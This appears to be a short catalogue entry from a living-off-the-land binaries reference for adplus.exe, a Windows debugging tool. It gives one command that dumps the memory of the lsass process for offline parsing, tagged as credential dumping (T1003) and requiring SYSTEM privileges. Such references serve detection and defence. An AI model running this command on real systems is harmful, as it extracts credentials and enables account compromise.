.. / adplus.exe
Star

Debugging tool included with Windows Debugging Tools


Paths:


Resources:
https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/

Acknowledgement:
mr.d0x - @mrd0x


Detection:



Dump

Creates a memory dump of the lsass process
adplus.exe -hang -pn lsass.exe -o c:\users\mr.d0x\output\folder -quiet
Usecase:Create memory dump and parse it offline
Privileges required:SYSTEM
OS:All Windows
Mitre:T1003